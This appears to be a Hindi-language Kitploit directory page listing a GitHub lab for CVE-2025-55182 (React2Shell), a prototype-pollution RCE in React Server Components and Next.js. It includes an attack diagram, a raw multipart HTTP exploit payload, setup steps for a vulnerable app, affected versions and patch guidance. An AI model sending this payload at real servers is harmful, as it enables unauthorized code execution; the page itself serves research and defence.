Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
react-rce — CVE-2025-55182 भेद्यता के लिए AI के साथ मिलकर एक नमूना लिखा और परीक्षण किया गया। | Kitploit
उपकरण/GitHubGitHub/randarts/react-rce
शोषण फ्रेमवर्कभेद्यता विश्लेषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षापेलोड डेवलपमेंटलैब और अभ्यास
GitHubrandarts/react-rce

react-rce

CVE-2025-55182 भेद्यता के लिए AI के साथ मिलकर एक नमूना लिखा और परीक्षण किया गया।

रिपॉजिटरी देखें
8 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182 React2Shell भेद्यता प्रयोग

उपयोग किया गया AI: Claude Opus 4.5 ⚠️ चेतावनी: यह वातावरण केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए उपयोग करें।

भेद्यता सारांश

आइटमसामग्री
CVECVE-2025-55182 (React) / CVE-2025-66478 (Next.js)
नामReact2Shell
CVSS10.0 (Critical)
प्रकारPre-Auth Remote Code Execution
कारणFlight प्रोटोकॉल डिसेरियलाइज़ेशन के दौरान प्रोटोटाइप प्रदूषण

हमले का सिद्धांत

root@kitploit:~
                    ┌─────────────────────────┐
                    │     Attacker            │
                    └───────────┬─────────────┘
                                │
                    POST Request + Next-Action Header
                    multipart/form-data payload
                                │
                                ▼
┌───────────────────────────────────────────────────────────┐
│                     Next.js Server                        │
├───────────────────────────────────────────────────────────┤
│  1. Next-Action हेडर → Server Action ट्रिगर                  │
│  2. multipart पेलोड → Flight प्रोटोकॉल डिसेरियलाइज़ेशन                │
│  3. Fake Chunk ऑब्जेक्ट की then() विधि कॉल                       │
│  4. __proto__ संदर्भ → प्रोटोटाइप प्रदूषण                           │
│  5. Function कंस्ट्रक्टर इंजेक्शन → RCE                               │
└───────────────────────────────────────────────────────────┘

एक्सप्लॉइट पेलोड संरचना

root@kitploit:~
POST / HTTP/1.1
Next-Action: x
Content-Type: multipart/form-data; boundary=----Boundary

------Boundary
Content-Disposition: form-data; name="0"

{"_response":{"_formData":{"get":"Function"}},"then":"$1:__proto__:then"}
------Boundary
Content-Disposition: form-data; name="1"

$@0
------Boundary--

मुख्य तत्व:

  • Next-Action हेडर से Server Action ट्रिगर करें
  • Field 0: प्रॉमिस-जैसे व्यवहार के लिए then विधि वाला Fake Chunk
  • Field 1: प्रोटोटाइप श्रृंखला को पार करने के लिए $@0 संदर्भ
  • __proto__:then के माध्यम से Function कंस्ट्रक्टर तक पहुंच

त्वरित आरंभ

root@kitploit:~
cd vulnerable-app

# निर्भरताएँ स्थापित करें
npm install

# डेवलपमेंट सर्वर प्रारंभ करें
npm run dev

http://localhost:3000 पर एक्सेस करें


निर्देशिका संरचना

root@kitploit:~
react-rce/
├── README.md
├── vulnerable-app/          # कमजोर Next.js ऐप
│   ├── package.json         # Next.js 15.0.3 (कमजोर संस्करण)
│   └── app/
│       ├── page.js          # UI (CVE जानकारी + RCE प्रदर्शन)
│       ├── actions.js       # Server Actions
│       └── globals.css
└── exploit/                 # आक्रमण उपकरण (वैकल्पिक)
    └── exploit.py           # CVE-2025-55182 PoC

प्रभावित संस्करण

  • React: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • Next.js: 15.x, 16.x (App Router उपयोग करने पर)
  • पैकेज: react-server-dom-webpack, react-server-dom-turbopack

बचाव के तरीके

root@kitploit:~
# पैच संस्करण में अपग्रेड करें
npm install [email protected] [email protected] [email protected]

संदर्भ

  • Next.js सुरक्षा सूचना
  • GitHub: assetnote/react2shell-scanner
  • GitHub: freeqaz/react2shell
टूल डाउनलोड करें